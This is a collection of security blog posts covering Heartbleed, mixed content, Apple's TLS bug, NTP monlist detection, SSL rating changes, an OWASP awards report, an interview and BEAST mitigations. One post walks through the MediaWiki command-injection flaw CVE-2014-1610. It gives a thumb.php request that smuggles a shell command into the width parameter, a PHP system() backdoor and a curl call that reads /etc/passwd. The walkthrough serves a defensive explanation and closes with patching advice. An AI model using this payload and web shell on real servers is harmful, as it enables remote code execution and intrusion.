
Security Labs


Heartbleed is the name of a critical vulnerability in OpenSSL, a very widely deployed SSL/TLS stack. A coding error was introduced into the OpenSSL 1.0.1 code, which was released in March 2012. The vulnerability is in the rarely used heartbeat mechanism, specified in RFC 6520. The error allows an attacker to trick the server into disclosing a substantial chunk of memory, repeatedly. As you can imagine, process memory is likely to contain sensitive information, for example server private keys for encryption. If those are compromised, the security of the server goes down the drain, too.

 

Your server is probably vulnerable if it's running any version in the OpenSSL 1.0.1 branch. If you'd like to check whether you're vulnerable, today I released a new version of the SSL Labs Server Test. I went to a lot of effort to implement a test that doesn't attempt exploitation (no server data is retrieved), so it should be safe to use. Despite the availability of the test, if you can identify the library version number, I would urge you to assume that you are vulnerable, even if the test is not showing a problem.
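
If you have shell access to a machine, one quick (if rough) check is to ask the local OpenSSL binary for its version. This is only indicative, because your server may be linked against a different copy of the library:

$ openssl version
OpenSSL 1.0.1f 6 Jan 2014

Any release from 1.0.1 through 1.0.1f is affected; 1.0.1g and later contain the fix, as do builds compiled with the heartbeat extension disabled.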

 

It's difficult to overestimate the impact of this problem. Although we can't conclusively say what exactly can leak in an attack, it's reasonable to assume that your private keys have been compromised. Addressing this issue requires at least three steps: 1) patch, 2) replace the key and certificate, and 3) revoke the old certificate. After that you will need to consider if any additional data might have been leaked too, and take steps to mitigate the leak.

 

Unless your server used Forward Secrecy (only about 7% do), it is also possible that any past traffic could be compromised, but only if you are faced with a powerful adversary who has the means to record and store encrypted traffic. If you did not support Forward Secrecy before, now is a great time to ensure you do from now on. If this topic is new for you, you can follow my advice here and here.

 

For more details on the nature of this OpenSSL bug, have a look at this post from Matthew Green.


Mixed content issues arise when web sites deliver their pages over HTTPS, but allow some of the resources to be delivered in plaintext. An active network attacker can't do anything about the encrypted traffic, but messing with the plaintext can result in attacks ranging from phishing in the best case to full browser compromise in the worst. A single exposed script is sufficient: the attacker can hijack the connection and inject arbitrary attack payloads into it.

 

We tend to talk a lot about other aspects of SSL/TLS, but mixed content is arguably the easiest way to completely mess up your web site encryption.

 

In the very early days of the Web, all mixed content was allowed; web browsers expected site operators to think through the consequences of mixing content. That, of course, did not result in great security. Site operators did whatever they needed to get their work done and decrease costs. Only in recent years did browser vendors start to pay attention and restrict mixed content.

Mixed content in modern browsers

Today, almost all major browsers tend to break mixed content into two categories: passive for images, videos, and sound; and active for more dangerous resources, such as scripts. They tend to allow passive mixed content by default, but reject active content. This is clearly a compromise between breaking the Web and reasonable security.

 

Internet Explorer has been the leader in secure mixed content handling. As early as Internet Explorer 5 (according to this post), they had detection and prevention of insecure content by default. Chrome started blocking by default in 2011, and Firefox in 2013. The default Android browser and Safari, however, still allow all mixed content without any restrictions (and with almost non-existent warnings).

 

Here are the results of my recent testing of what insecure content is allowed by default:

 

Browser                 Images  CSS  Scripts  XHR  WebSockets  Frames
Android browser 4.4.x   Yes     Yes  Yes      Yes  Yes         Yes
Chrome 33               Yes     No   No       Yes  Yes         No
Firefox 28              Yes     No   No       No   No          No
Internet Explorer 11    Yes     No   No       No   No          No
Safari 7                Yes     Yes  Yes      Yes  Yes         Yes

 

The results are mostly as expected, but there's a surprise with Chrome, which blocks active page content, but still allows plaintext XMLHttpRequest and WebSocket connections.

 

It's worth mentioning that the table does not tell us everything. For example, browsers tend not to control what their plugins do. Further, certain components (e.g., Flash or Java) are full environments in their own right, and there's little browsers can do to enforce security.

Testing for mixed content handling in SSL Labs

To make it easier to evaluate browser handling of this problem, I recently extended the SSL Labs Client Test to probe mixed content handling. When you visit the page, your browser is tested, and you will get results similar to these:

 

[Screenshot: SSL Labs Client Test, mixed content handling results]

Mixed content prevalence

Anecdotally, mixed content is very common. At Qualys, we investigated this problem in 2011, along with several other application-level issues that result in full breakage of encryption in web applications. We analysed the homepages of about 250,000 secure web sites from the Alexa top 1 million list, and determined that 22.41% of them used insecure content. If images are excluded, the number falls to 18.71%.

 

A more detailed study of 18,526 sites extracted from the Alexa top 100,000 took place in 2013: A Dangerous Mix: Large-scale analysis of mixed-content websites (Chen et al.). For each site, up to 200 secure pages were analysed, arriving at a total of 481,656 pages. Their results indicate that up to 43% of web sites have mixed content issues.

Mitigation

The best defence against mixed content issues is simply not having this type of problem in your code. But that's easier said than done; there are many ways in which mixed content can creep in. When that fails, there are two technologies that can come in useful:

 

  • HTTP Strict Transport Security (HSTS) is a mechanism that enforces secure resource retrieval, even in the face of user mistakes (attempting to access your web site on port 80) and implementation errors (your developers place an insecure link into a secure page). HSTS is one of the best things that happened to TLS recently, but it works only on the hostnames you control.
  • Content Security Policy (CSP) can be used to block insecure resource retrieval from third-party web sites. It also has many other useful features to address other application security issues, for example XSS. Example headers for both are sketched below.
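
As a rough illustration, both defences come down to a pair of response headers; the values below are only an example and would need tuning for a real site:

Strict-Transport-Security: max-age=31536000; includeSubDomains
Content-Security-Policy: default-src https:

The first header tells browsers to talk to your hostnames only over TLS for the next year; the second is a deliberately strict policy that allows resources to be loaded only from https: URLs (a production policy will usually need additional directives).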

News recently broke about an exploit targeting MediaWiki, the software that powers large-scale websites such as Wikipedia. What makes it really exciting is the fact that it is only the third remote code execution vulnerability to affect this open-source web platform. Discovered by Check Point vulnerability researchers, this vulnerability, CVE-2014-1610, affects MediaWiki 1.22.x before 1.22.2, 1.21.x before 1.21.5 and 1.19.x before 1.19.11. Because it allows the attacker to compromise the underlying system, it is important to identify and patch affected systems.

 

Conditions Required to Exploit

Exploiting this vulnerability is tricky, as it is exploitable only under the following conditions:

  1. MediaWiki must have uploads enabled, i.e. $wgEnableUploads must be set to true.
  2. The .pdf and .djvu file types must be allowed via $wgFileExtensions, and the PdfHandler extension must be enabled (a LocalSettings.php sketch appears after this list).
  3. The user must be in a group with the "upload" right. By default this is given to all logged-in users.
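
For reference, enabling all three preconditions on a test installation comes down to a few lines in LocalSettings.php. This is a hypothetical sketch for a 1.22-era installation (the extension path may differ), not a configuration you should deploy:

$wgEnableUploads = true;                                    // allow file uploads
$wgFileExtensions[] = 'pdf';                                // permit .pdf uploads
$wgFileExtensions[] = 'djvu';                               // permit .djvu uploads
require_once "$IP/extensions/PdfHandler/PdfHandler.php";    // enable the PdfHandler extension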

 

Under default conditions (even on older versions) the first two conditions are not met. MediaWiki versions 1.1 and later have uploads disabled by default: $wgEnableUploads is set to false, and the permitted file types are png, gif, jpg and jpeg only. DjVu has been natively supported since MediaWiki version 1.8. However, file uploads and the PdfHandler extension can easily be enabled.

 


Figure 1: Configuration page for enabling file uploads

 

The LocalSettings.php file provides local configuration for a MediaWiki installation.

 


Figure 2: Configuration file, showing that uploads are disabled by default

 

How the Exploit Works

The vulnerability exists in the PdfHandler_body.php and DjVu.php source files, which fail to sanitize shell meta-characters. Shell meta-characters are special characters in a command that allow you to communicate with the Unix system using a shell. Some examples of shell meta-characters are the opening square bracket [, backslash \, dollar sign $, pipe symbol |, question mark ? and asterisk or star *.

 

MediaWiki does have a function, wfEscapeShellArg(), to specifically escape such input. But due to an apparent programming error, it fails to escape input received via certain parameters, such as the height and width that are used while creating a thumbnail of the uploaded file. If file uploads and the PdfHandler extension are enabled, you will be presented with the following screen, with an Upload file link in the left column:

 


Figure 3: Example of MediaWiki page with file uploads enabled

 

 

After uploading a .PDF file, the thumb.php source file is used to create a thumbnail and resize images when a web browser requests the file. PdfHandler is a handler called by thumb.php for viewing PDF files in image mode. You can call it with the width, height, etc. parameters to manipulate the thumbnail dimensions:

 


Figure 4: An example of a thumbnail created by thumb.php

 

 

thumb.php effectively acts as the interface between requests and the various media handlers. This is the key to this vulnerability: simply by passing shell meta-characters to this source file, you can compromise the system.
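
To make the class of bug concrete, here is a deliberately simplified PHP sketch (not MediaWiki's actual code) of the difference between interpolating a request parameter straight into a shell command and escaping it first:

// Unsafe: a width of  400|`...`  smuggles a second command into the pipeline
$cmd = "convert -resize {$width} in.pdf out.jpg";

// Safe: shell meta-characters in $width are neutralised before the command runs
$cmd = "convert -resize " . wfEscapeShellArg( $width ) . " in.pdf out.jpg";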

 

For demonstration purposes, I will be writing a trivial .php shell file, which can execute commands. In Figure 5 below, the highlighted code is where I'm exploiting the width "w" parameter to write <?php system($_GET[cmd]); into the images/backdoor.php file.

 


Figure 5: Exploit in action
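
Decoded, the request behind this step has roughly the following shape (hypothetical host and uploaded file name; the URL-encoded original appears in the debug log further below):

GET /mediawiki/thumb.php?f=Example.pdf&w=400|`echo "<?php system(\$_GET[cmd]);">images/backdoor.php`

Everything after 400 is attacker-controlled: the pipe and the backticks break out of the -resize argument, and the echo writes a one-line PHP backdoor into the images directory.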

 

 

Choosing a directory with the right permissions is important here. In this case, we have written the shell into the /images folder:

 


Figure 6: Directory with backdoor.php installed by the attacker

 

 

Now you can run a command of your choice:

 


Figure 7: Oh no! The attacker can read the /etc/passwd file
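
For reference, invoking the planted backdoor is then a single request (hypothetical host name):

curl 'http://wiki.example.com/mediawiki/images/backdoor.php?cmd=cat%20/etc/passwd'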

 

 

What’s going on in the background?

MediaWiki has a very robust debugging environment that helps you debug anything – SQL errors, server errors, extension errors, etc. In this case, to understand what goes on behind the scenes, we simply add the following line to the LocalSettings.php file.

 

$wgDebugLogFile = "/tmp/debug.log";

 

When you set this directive, you see all that MediaWiki does behind the scenes. This event is of particular importance to us:

 

Start request GET /mediawiki/thumb.php?f=Aisb08.pdf&w=400|%60echo%20%22%3C?php%20system(\\$_GET[cmd]);%22%3Eimages/backdoor.php%60

 

HTTP HEADERS:

 

HOST: localhost

 

.

 

.

 

FileBackendStore::getFileStat: File mwstore://local-backend/local-thumb/4/41/Aisb08.pdf/page1-400|`echo "<?php system(/$_GET[cmd]);">images/backdoor.php`px-Aisb08.pdf.jpg does not exist.

 

IP: 127.0.0.1

 

User: cache miss for user 1

 

User: loading options for user 1 from database.

 

User: logged in from session

 

File::transform: Doing stat for mwstore://local-backend/local-thumb/4/41/Aisb08.pdf/page1-400|`echo "<?php system(\\$_GET[cmd]);">images/backdoor.php`px-Aisb08.pdf.jpg

 

PdfHandler::doTransform: ('gs' -sDEVICE=jpeg -sOutputFile=- -dFirstPage=1 -dLastPage=1 -r150 -dBATCH -dNOPAUSE -q '/var/www/mediawiki/images/4/41/Aisb08.pdf' | 'convert' -depth 8 -resize 400|`echo "<?php system(\\$_GET[cmd]);">images/backdoor.php` - '/tmp/transform_d386f8960888-1.jpg') 2>&1

 

wfShellExec: /bin/bash '/var/www/mediawiki/includes/limit.sh' '('\''gs'\'' -sDEVICE=jpeg -sOutputFile=- -dFirstPage=1 -dLastPage=1 -r150 -dBATCH -dNOPAUSE -q '\''/var/www/mediawiki/images/4/41/Aisb08.pdf'\'' | '\''convert'\'' -depth 8 -resize 400|`echo "<?php system(\\$_GET[cmd]);">images/backdoor.php` - '\''/tmp/transform_d386f8960888-1.jpg'\'') 2>&1' 'MW_INCLUDE_STDERR=;MW_CPU_LIMIT=180; MW_CGROUP='\'''\''; MW_MEM_LIMIT=307200; MW_FILE_SIZE_LIMIT=102400; MW_WALL_CLOCK_LIMIT=180'

 

Here you see that MediaWiki first checks whether the thumbnail already exists. Then PdfHandler is called with the "-resize 400" parameter to create an image whose width is 400. Finally, wfShellExec ends up writing the injected PHP shell into the /var/www/mediawiki/images/ folder.

 

End of story!

 

QualysGuard uses the BlindElephant engine to detect this vulnerability, using a method called static file fingerprinting to detect web application versions. BlindElephant is a fast, accurate, and very generic web application fingerprinter that identifies application and plugin versions via static files. A whitepaper containing more information about this static file fingerprinting technique sheds more light on the concept. It should be noted, however, that the BlindElephant engine included in QualysGuard is an advanced version with a few more features than the one available publicly.

 

How to Protect your MediaWiki Systems

What can you do to protect yourself from such attacks?

 

The Apache process should be configured with read-only access to the MediaWiki files. Ownership and write permissions should be assigned to a separate user. For example, on many systems the Apache process runs as www-data:www-data. This www-data user should be able to read all of the files in your MediaWiki directory, either through group permissions or through "other" permissions. It should not have write permissions to the code in your MediaWiki directory. If you use features of MediaWiki which require the "files" directory, then give the www-data user permission to write files only in that directory.
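
On a typical Debian-style system where Apache runs as www-data, that policy might look roughly like this (paths and names are assumptions for illustration only):

chown -R root:root /var/www/mediawiki                     # code owned by root, not the web user
chmod -R o+rX /var/www/mediawiki                          # www-data can read and traverse, but not write
chown -R www-data:www-data /var/www/mediawiki/images      # only the upload directory stays writable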

 

Among other steps, be sure to follow the MediaWiki security recommendations. Additionally, the MediaWiki Security Guide is a more comprehensive guide to set up your own MediaWiki server and write secure PHP and Javascript code that is easy to review and audit.

 

Qualys customers with VULNSIGS-2.2.644-1 and onwards will be alerted of this vulnerability via QID: 12832 - MediaWiki DjVu and PDF File Upload Remote Code Execution Vulnerability. Customers are advised to upgrade to MediaWiki versions 1.22.2, 1.21.5, 1.19.11 or later to remediate this vulnerability.


On Friday, Apple released patches for iOS 6.x and 7.x, addressing a mysterious bug that affected TLS authentication. Although no further details were made available, a large-scale bug hunt ensued. This post on Hacker News pointed to the problem, and Adam Langley followed up with a complete analysis.

 

I've just released an update for the SSL Labs Client Test, which enables you to test your user agents for this vulnerability.

 

This bug affects all applications that rely on Apple's SSL/TLS stack, which probably means most of them. Applications that ship with their own TLS implementations (for example, Chrome and Firefox) are not vulnerable. For iOS, it's not clear exactly when the bug was introduced. For OS X, it appears that only OS X 10.9 Mavericks is vulnerable.

 

What you should do:

  • iOS 6.x and 7.x: Patches are available, so you should update your devices immediately.
  • OS X 10.9.x: Apple initially promised a fix would be available soon; the vulnerability has since been fixed in 10.9.2. Update immediately.

The ntpd program is an operating system daemon that sets and maintains the system time in synchronization with Internet standard time servers. As described in CVE-2013-5211, a denial of service condition can be caused by the use of the "monlist" feature, which is enabled by default on most NTP servers. NTP runs over UDP port 123, and because UDP is connectionless, the source address can be spoofed easily.

 

When the UDP service is queried remotely or the monlist command is run locally (ntpdc -c monlist), the service outputs the list of the last 600 queries that were made from different IP addresses. If the attacker spoofs the source address to be the victim's address, then all the responses are sent back to the victim's address. And because the response data is large, the victim's machine may not be able to handle the response, which can cause a denial of service condition as described in Detect NTP Amplification Flaws.
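
If you want to check one of your own servers by hand, the same query can be issued remotely with the ntpdc utility (the host name below is a placeholder); a vulnerable server returns its list of recent clients, while a patched or restricted one returns nothing or times out:

ntpdc -n -c monlist ntp.example.com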

 

How This Vulnerability Detection Works

Qualys tracks this vulnerability with QID 121695. The scanner first checks whether the NTP service is running. After that it sends a MON_GETLIST request to the NTP server, as shown in the screen capture below.

 


Fig. 1: MON_GETLIST request

 

 

If the server responds to this request with MON_GETLIST data and the size of each data item in the packet is equal to 0x48 (72 in decimal), that implies that the monlist feature is enabled, and the vulnerability is reported. This is shown in the screen capture below.

 


Fig. 2: MON_GETLIST response with the first 8 bytes underlined in yellow

 

 

NTP Monlist Packet Explanation

In order to understand how the size of each data item is determined, we need to take a look at the monlist packet format. The size is represented in the 7th and 8th bytes.

 

The NTP monlist feature uses mode 7 packets. A mode 7 packet is used for exchanging data between an NTP server and a client for purposes other than time synchronization, e.g. monitoring, statistics gathering and configuration. A mode 7 packet has the following format:


Fig. 3: Mode 7 Packet format

 

 

In the example listed in Fig. 2, the response field is: "d7 00 03 2a 00 06 00 48" (underlined in yellow).

 

The first byte 0xd7 is decoded as below:

  1. R (i.e. Response Bit): Since this is a response, the bit is set.
  2. M (i.e. More Bit): Set for all packets but the last in a response which requires more than one packet. In this example it is set to 1.
  3. VN (i.e. Version Number): 2 in this example.
  4. Mode: 7, since this is a mode 7 response.

 

The second byte 0x00 is decoded as below:

  1. A (i.e. Authenticated bit): If set, this packet is authenticated. 0 in this example.
  2. Sequence number: For a multipacket response, this contains the sequence number of this packet. 0 is first in the sequence, 127 (or less) is the last. 0000000 in this example, as it is the first packet.

 

The third byte 0x03 is decoded as below:

Implementation number: An implementation number of zero is used for request codes/data formats which all implementations agree on. Implementation number 255 is reserved (for extensions, in case we run out). In our example it is 0x03 (00000011), which is XNTPD.

 

The fourth byte 0x2a is decoded as below:

Request code: An implementation-specific code which specifies the operation to be (or which has been) performed and/or the format and semantics of the data included in the packet. In this example it is 0x2a, which is MON_GETLIST_1 (42).

 

The fifth and sixth bytes, 0x00 and 0x06, are decoded as below:

  1. Err (4 bits): Must be 0 for a request. For a response, holds an error code relating to the request. If nonzero, the operation requested wasn't performed. The error codes are listed below. In this response example it is 0x0, which implies no error.
    • 0 - no error
    • 1 - incompatible implementation number
    • 2 - unimplemented request code
    • 3 - format error (wrong data items, data size, packet size etc.)
    • 4 - no data available (e.g. request for details on unknown peer)
    • 5-6 - unknown
    • 7 - authentication failure (i.e. permission denied)
  2. Number of data items (12 bits): 0 to 500. In this example 6 data items were returned.

 

The seventh and eighth bytes, 0x00 and 0x48, are decoded as below:

  1. MBZ: A reserved data field, must be zero in requests and responses.
  2. Size of data item: Size of each data item in the packet, 0 to 500. In the case of MON_GETLIST_1 it is 0x48, which is what we see in this example.

 

Next is the Data field which is a variable sized area containing request/response data. For requests and responses the size in octets must be greater than or equal to the product of the number of data items and the size of a data item. For requests the data area must be exactly 40 octets in length. For responses the data area may be any length between 0 and 500 octets inclusive.

 

Conclusion

If a MON_GETLIST request is sent to the NTP server and it responds with monlist data in which the size of each data item is 0x48, then we can be sure that the target is vulnerable to the NTP monlist denial of service vulnerability.

 

Recommendation

In order to take immediate action on this vulnerability, users are advised to disable the "monlist" functionality by adding the following lines to the ntp.conf file:

 

restrict default kod nomodify notrap nopeer noquery
restrict -6 default kod nomodify notrap nopeer noquery

 

This restricts monlist queries on the NTP server, preventing the attack.

 

We recommend that our customers scan their systems for QID 121695 - NTP monlist feature Denial of Service Vulnerability and apply security updates as soon as possible.


Today, we're releasing a new version of SSL Rating Guide as well as a new version of SSL Test to go with it. Because the SSL/TLS and PKI ecosystem continues to move at a fast pace, we have to periodically evaluate our rating criteria to keep up.

 

We have made the following changes:

 

  • Support for TLS 1.2 is now required to get an A. If this protocol version is not supported, the grade is capped at B. Given that, according to SSL Pulse, TLS 1.2 is supported by only about 20% of servers, we expect this change to affect a large number of assessments.
  • Keys below 2048 bits are now considered weak, with the grade capped at B.
  • Keys below 1024 bits are now considered insecure, and given an F.
  • MD5 certificate signatures are now considered insecure, and given an F.
  • We introduce two new grades, A+ and A-, to allow for finer grading. This change allows us to reduce the grade slightly, when we don't want to reduce it to a B, but we still want to show a difference. More interestingly, we can now reward exceptional configurations.
  • We also introduce a concept of warnings; a server with good configuration, but with one or more warnings, is given a reduced grade of A-.
  • Servers that do not support Forward Secrecy with our reference browsers are given a warning.
  • Servers that do not support secure renegotiation are given a warning.
  • Servers that use RC4 with TLS 1.1 or TLS 1.2 protocols are given a warning. This approach allows those who are still concerned about BEAST to use RC4 with TLS 1.0 and earlier protocols (supported by older clients), but we want them to use better ciphers with protocols that are not vulnerable to BEAST. Almost all modern clients now support TLS 1.2.
  • Servers with good configuration, no warnings, and good support for HTTP Strict Transport Security (long max-age is required), are given an A+.

 

I am very happy that our rating approach now takes into account some very important features, such as TLS 1.2, Forward Secrecy, and HSTS. Frankly, these changes have been overdue. We originally meant to have all of the above in a major update to the rating guide, but we ran out of time, and decided to implement many of the ideas in a patch release.


The recent Global OWASP AppSec conference, held the week of November 18 - 22 at the Marriott Marquis in New York City, was a great way to learn more about the latest trends in application security and exchange ideas with other application security professionals. The conference included updates on many of the OWASP projects as well as some interesting presentations such as:

  • OWASP Zed Attack Proxy – Simon Bennetts
  • Hack.me: a new way to learn web application security – Armando Romeo
  • The Perilous Future of Browser Security – RSnake

 

But the highlight of the show for me was the presentation of the 2nd annual Web Application Security People of the Year (WASPY) Awards. The awards were created in 2012 to honor the top OWASP contributors in a number of different categories. Nominations for the different categories started in May of 2013 and were then voted on during the OWASP annual elections in September. So the WASPY award winners represent the best of OWASP as voted on by the OWASP membership.

 


From right to left: Helen Gao (2012 winner), Representative for Abbas Naderi, Martin Knobloch, Fabio Cerullo, Simon Bennetts, Richard Greenberg, Tin Zaw, Edward Bonver

 

 

OWASP decided to update the format this year to include a number of different categories including:

  • Best Chapter Leader
  • Best Project Leader
  • Best Community Supporter
  • Best Mission Outreach
  • Best Innovator

 

The WASPY Awards ceremony was held on the evening of the first day of the full conference. Dan Cornell, a principal at The Denim Group, did a fantastic job hosting the ceremony, with Kelly Santalucia and Kate Hartman from OWASP providing support. Helen Gao, the 2012 winner of the WASPY award, was present and gave an inspirational introduction prior to the awards. Each of the awards included a plaque along with a gift certificate for $1000!

 

2013 WASPY Award Winners

Congratulations to the 2013 WASPY Award winners:

 

Best Chapter Leader

Tin Zaw, Richard Greenberg, Kelly Fitzgerald, Stuart Schwarz & Edward Bonver (LA Chapter Leaders)

 

Best Project Leader

Simon Bennetts

 

Best Community Supporter

Fabio Cerullo

 

Best Mission Outreach

Martin Knobloch

 

Best Innovator

Abbas Naderi

 

It was a great few days learning about the latest and greatest in web application security in a great location on Times Square, topped off by honoring the best that OWASP has to offer!


An interview with Judie Ayoola, security architect at the Kantar Group, one of the world's largest market research and consultancy firms and a Qualys customer. Paul Fisher went to meet her.

 

Paul Fisher: How and why did you get into information security as a career?


Judie Ayoola: I accidentally fell into security. I originally trained to be a librarian and, while I loved the job, I found myself increasingly reading the computer books while I was classifying them.  I was intrigued about the workings of computers and while I was pursuing my degree in librarianship, one of the modules I did was on the digital storage of information and digital asset management, which I enjoyed. However this was nothing compared to my awakened interest in computer networking and I thought: ‘Wow this is more interesting than what I was doing’, and toyed with the idea of pursuing a Masters in IT.

 

Thanks to the Sybex series on computing, I started dabbling with Windows NT, built my own home lab and started experimenting - in a way I became a librarian techy!  Thus it became a natural progression to start looking for IT support roles after successfully passing a number of MCP exams and this landed me a support position at the University of Westminster. 

 

Throughout my professional life, I’ve tended to grab any opportunity that came my way and whilst working in the support role, a position came up for the role of the IT Security Officer which I applied for. It was a steep learning curve but what kept me going was my passion and the new learning opportunities that came with it. And it has been the same since; in order to protect your data and systems, it is imperative that you keep up to date with the types of attack threat vectors and controls to keep out attackers.

 

Paul: All of which has led to your current position at the Kantar Group, where you say you take a risk-based approach to the security of the business. What do you mean by that?

 

Judie: I start from the premise that it is impossible to protect all the data on the network so using a risk-based approach is the best way to protect your assets with the most cost effective measures. The risk-based approach is predicated on an understanding of your business, its processes and the type of data the organization handles and compliance obligations; in a nutshell it is establishing what is really important to the organisation and the information it needs to survive.

 

At the University, for example, student records were central to the business of the university. These were our crown jewels and it was paramount that they were protected with different layers of controls, be they procedural, technical or through user awareness. It is also important to know the value of different types of data to the business - is it worth $10,000 or $1m? The value also changes depending on circumstance or even the time of year. For example, in September student enrolment payments and systems would assume higher importance - later in the year, the intranet or CMS would be more important. Therefore it is important to engage with the business in order to identify any changes in process that would affect your ability to support their security requirements - without this approach there will be a disconnect between the implemented controls and their effectiveness. Finally, you have to map threat scenarios or use threat modelling to determine what kind of attacks you are most likely to suffer, the vulnerabilities in your systems or processes and the consequences of a data breach. The most important thing to remember is that your risk assessments must always be based on what the business feels is important, not what IT thinks is important.

 

Paul: Sounds a very sensible and forward thinking approach, but do you think that sometimes the threats get over hyped by vendors?

 

Judie: Yes and no. Vendors need to provide a compelling reason to sell their products, but we do need to be realistic; so-called APT attacks happen because our carefully implemented security controls failed. It's certainly true that the attacks are sophisticated and the motives for these attacks have also changed. However, how often do we measure the effectiveness of the controls against these new attacks? Are we still concentrating on securing the perimeter without addressing web-borne threats or application-layer attacks? What about phishing attacks? How do we dissuade users from falling prey to phishing attacks such as spear phishing? We do need to maintain a sense of perspective. We need to identify the vulnerabilities in our systems, understand how they could be exploited and implement controls to minimise the exposure to these vulnerabilities. Security professionals need to keep up to date with the threats against their businesses or other businesses in the same verticals, and use reports of data breaches in the media to assess the effectiveness of their own controls to prevent such breaches on their own network. I would also advocate dovetailing on such stories to sell the security message to the business. Rather than purchase every new solution that addresses the latest type of attack, we need to assess what threat the solution will be addressing and how it would integrate into our existing security strategy; otherwise we risk implementing silo systems, which invariably introduce complexity and over-engineering of the network. If I take the attack against Lockheed Martin in 2011 as an example, it appears the attackers used valid credentials of one of their business partners, including their RSA token, to gain unauthorised access to the network, but this was detected by their monitoring system, which was monitoring all user activity including third parties. Would an APT system have prevented an attacker from using a trusted path to attack the network? I would say that a combination of access controls, auditing, monitoring and an effective incident response program prevented the attackers from gaining access to their data. What is certain is that the attackers' modus operandi keeps evolving, and we need to monitor and measure our network's effectiveness to withstand such attacks.

 

Paul: Today everyone is talking about the cloud, how is this changing business security?

 

Judie: Cloud enables the loose coupling of business technology. Cloud computing can benefit companies in a number of ways such as easier maintenance and upgrades, greater flexibility and mobility and continuity of business; however I believe that the only difference between the Cloud and the local data centre is just the physical location.  In terms of the security responsibilities, this does not change. The reluctance of a number of companies to move to the cloud is because of the security challenges but security professionals have to engage with the business and rather than focus on the risks from the cloud, we need to keep the business informed about how these risks can be mitigated to support the secure transaction of business. 

 

As a security architect designing your information security systems, you need to flesh out the security requirements (how, where, when, what and who will need access to the information) as well as the security standards and compliance obligations, and implement systems that address these requirements. These responsibilities should not be transferred to the cloud provider, even if they have multiple security certifications such as ISO 27001, SSAE 16, PCI DSS etc. Therefore, in terms of business security, we need to implement the same preventative, detective, deterrent, corrective and recovery controls in the cloud. I am aware that this will depend on the type of cloud delivery model implemented, be it SaaS, PaaS or IaaS, and businesses have more control in the case of an IaaS model; but irrespective of the cloud delivery model, the Security and Compliance teams have to ensure that the cloud provider has systems and controls to protect their data, and should ask the cloud service provider for their third-party audit reports and certifications.

 

Paul: So, what is the best part of your job?

 

Judie: It's the feeling of adding value to the business and that there hasn't been a financial impact due to inadequate security measures. It is important that the systems that are implemented are appropriate and cost effective and meet the needs of the business. It's about keeping up to date with the ever evolving threat landscape, monitoring the environment, checking on the systems and ensuring that you are providing valid metrics that give evidence that security implementation positively impacts the organization's mission success.

 

When I was at the University of Westminster, the security team pressed home the message that security was everyone's responsibility. We could measure the effectiveness of our user awareness campaigns by the number of emails or tickets raised to report phishing emails - even though we had filters to detect and block them - because it showed that the users were being vigilant.

 

Paul: That’s a good point. How do you educate people on security awareness?

 

Judie: I am of the opinion that people change their behaviour if what you are trying to change resonates with them. I had an old Director who put it rather succinctly: ‘What’s in it for me?’ And that is now how I try to sell the message of security. An example is rather than tell users not to click on links in emails or malicious websites, you need to tell them why and the impact of doing that and if possible provide examples of reports of phishing victims.  Thankfully the Internet is awash with such security information and we should use such security incidents in the media to drive home the message of security.  We also have to provide the information in bite size and in a medium that meets the different users, such as podcast, videos, flyers or the intranet.

 

Paul: So what about the qualities of people working in information security, what do they need?

 

Judie: We need people who are not simply technical but also those who can sell information security. We need people who can go to the business and speak to them in a language they can understand, irrespective of their position within the organisation, and ensure that the information is relevant to the user. That is probably the most important quality. An example is that when discussing security with the CEO, you have to focus on the financial value of preventing viruses rather than the number of viruses that were stopped by the AV software. In a nutshell, in addition to technical skills, we also need people with communication and marketing skills and the ability to apply social and behavioural science to dealing with the human factors of security defence.

 

Paul: So if you invent one piece of security hardware or software, what would it be? 

 

Judie: I would want one piece of hardware that tells me what my vulnerabilities are, has the intelligence to classify data dynamically, identifies and prevents attacks targeting the network; but in the event that an incident does occur, the system should also prevent the attack from accessing any critical data and limit their activities on the network. My ideal system would also use big data analytics to boost security. Not much really....everything in one!

 

Paul: Thank you, Judie


Last week, on October 22, Apple released OS X 10.9 Mavericks, the latest version of their desktop operating system. This was a very important update, given that Safari now, in version 7, supports TLS 1.2. We are slowly moving toward a world in which TLS 1.2 is widely supported. Still, I wanted more. I was hoping that this OS X release was also going to have BEAST mitigations enabled by default. After all, the code was already a part of the previous OS X release (Mountain Lion) and the compatibility risks are minimal given that all other major browser vendors enabled the 1/n-1 split in early 2012.

 

Going through the security release notes, I was excited to see the BEAST attack (CVE-2011-3389) mentioned, but the explanation of the fix was disappointing. It said:

This issue was addressed by enabling TLS 1.2.

The BEAST attack affects only TLS 1.0 and earlier protocols, but client-side support for TLS 1.2 is currently not sufficient as defence because (1) only about 20% of servers support this protocol version and (2) all major browsers are susceptible to protocol downgrade attacks, which can be carried out by active MITM attackers.

 

There was still hope that the release notes were incomplete and I didn't want to give up just yet. Given that Apple releases parts of their operating system as open source and that the code for 10.9 was already available, I thought that reading the source code would be a good starting point. And I knew where I should look, because I had previously examined the SSL stack of Mountain Lion.

 

Today, I was delighted to see that the code had been changed, and that the default setting had been changed from disabled to enabled, meaning that the SSL stack that ships with OS X 10.9 uses BEAST mitigations by default. To see for yourself, look for the first mention of defaultSplitDefaultValue in the source code. It's near the top of the file.

 

Just to be completely sure, I subsequently observed the 1/n-1 split in action using Safari 7 and Wireshark, against a server running TLS 1.0 with only a single CBC suite configured.

Enabling mitigations on Mountain Lion

If you're still running the previous OS X version and do not wish to upgrade at this time, you can manually enable the BEAST mitigations by executing the following command:

 

$ sudo defaults write /Library/Preferences/com.apple.security SSLWriteSplit -integer 2

 

At the very least, you will need to restart Safari; it's probably best to restart the computer. (Disclaimer: I don't have a Mountain Lion installation and have not tried this procedure for myself.)

BEAST has finally been mitigated client-side

With this, we can finally conclude that BEAST has been sufficiently mitigated client-side, and move on.


Update (11 Nov 2013): Even though the source code indicates that the mitigation can be controlled, in practice that does not seem to be the case. It is possible that there is a bug in the CoreFoundation framework that prevents the code from reading the settings correctly. Replacing kCFPreferencesAnyHost with kCFPreferencesCurrentHost in the CFPreferencesCopyValue() invocation makes it work, but requires a one-byte patch to the relevant system library. This investigation is the work of Stefan Becker, who also reported the problem to Apple.


Continuous Monitoring has become an overused and overhyped term in security circles, driven by US Government mandate (now called Continuous Diagnostics and Mitigation). But that doesn’t change the fact that monitoring needs to be a cornerstone of your security program, within the context of a risk-based paradigm. So your pals at Securosis did their best to document how you should think about Continuous Security Monitoring and how to get there.

 

